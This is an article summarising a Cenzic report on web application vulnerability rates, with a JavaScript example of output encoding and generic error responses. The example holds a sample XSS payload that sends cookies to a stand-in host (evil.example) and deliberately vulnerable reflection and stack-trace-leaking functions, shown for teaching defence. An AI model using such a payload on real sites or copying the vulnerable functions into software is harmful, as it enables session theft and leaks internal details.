Security is getting stronger, but attackers and the vulnerabilities they exploit are keeping pace.
In a world of BYOD, cloud services and mobile applications, and of companies failing to detect and address exploits around information leakage, authentication and authorization, and session management, vulnerabilities are everywhere. The median number of vulnerabilities per application has risen to 14, up from 13 the previous year, according to a new report by web application security solutions firm Cenzic.
The report revealed a wide range of findings regarding application vulnerabilities including:
• Steady growth in the incidence of security flaws in mobile applications. The report found that privacy violations and excessive privileges appear in over 80 percent of mobile applications.
• Increasing incidence of vulnerabilities in applications shared with third parties. Cloud service providers and supply-chain partners that may sit outside the organization’s sphere of influence are a major source of threats today.
• Information leakage comes from vulnerable applications. Around 23 percent of vulnerabilities related to information leakage, in which an application inappropriately discloses sensitive data, such as technical details of the application (stack traces, version strings, internal paths) or user-specific data.
• The age-old problem of Cross-Site Scripting (XSS) is still to blame. Twenty-five percent of vulnerabilities related to XSS, in which an application echoes attacker-supplied input into a page without encoding it, so that a script delivered through an otherwise trusted URL runs in the victim’s browser with the trusted site’s privileges.
• Other vulnerability categories are not going away either. Flaws in authentication or authorization made up 15 percent of vulnerabilities, and session management errors accounted for 13 percent.
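The two largest categories above, information leakage and XSS, both come down to what an application hands back to the client. The following is an added illustration, not code from the Cenzic report or from any product it evaluates: a search page that reflects a query parameter in its vulnerable and hardened forms, and an error handler that leaks a stack trace beside one that logs the detail server-side and returns only a correlation id. The function names, the constructed payload, the fake database error and the caller-supplied `correlationId` are all assumptions made for the demo.

```javascript
// Added example: output encoding against reflected XSS, and a generic error
// response against information leakage. Constructed demo, not Cenzic's code.

// Characters that must be encoded before untrusted text is placed into an
// HTML element body. Attribute, URL and JavaScript contexts need stricter rules.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query string is reflected into the page verbatim, so a link
// such as /search?q=<script>...</script> runs attacker script in the victim's
// browser under the trusted site's origin.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the same template, with the untrusted value encoded for the
// HTML-body context it lands in. The payload is displayed as text, not parsed.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Information leakage, vulnerable form: the raw error (stack frames, file
// paths, hostnames, framework names) goes straight to the client.
function errorResponseVulnerable(err) {
  return { status: 500, body: `Internal error: ${err.stack}` };
}

// Hardened form: the detail is written to a server-side log keyed by a
// correlation id; the client sees only the id. `log` is any array-like sink
// and `correlationId` is supplied by the caller (an assumption made here so
// the function is deterministic; real code would generate it per request).
function errorResponseSafe(err, log, correlationId) {
  log.push(`[${correlationId}] ${err.name}: ${err.message}\n${err.stack}`);
  return { status: 500, body: `Something went wrong. Reference: ${correlationId}` };
}

// Demo run with a constructed payload and a constructed backend error.
const payload =
  '<script>document.location="https://evil.example/?c="+document.cookie</script>';
console.log(renderSearchVulnerable(payload)); // script tag survives intact
console.log(renderSearchSafe(payload));       // shown as literal text

const serverLog = [];
const dbErr = new Error('connect ECONNREFUSED 10.0.0.5:5432');
console.log(errorResponseVulnerable(dbErr).body);                  // leaks host, port, stack
console.log(errorResponseSafe(dbErr, serverLog, 'req-0001').body); // generic message only
```

Encoding at the point of output is what prevents the XSS class the report counts; input validation alone does not, because the same value may land in HTML, attribute, URL or script contexts that each need different encoding. For the leakage case, the correlation id lets support staff find the full trace in the log without the client ever seeing it.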
The catch is that quite a few of today’s vulnerabilities are preventable.
Cenzic outlined key best practices to remind enterprises of some simple solutions that can help secure their applications:
1. Implement Safe Coding Practices
2. Use Web Application Firewalls (WAFs)
3. Ensure Proper Server Configurations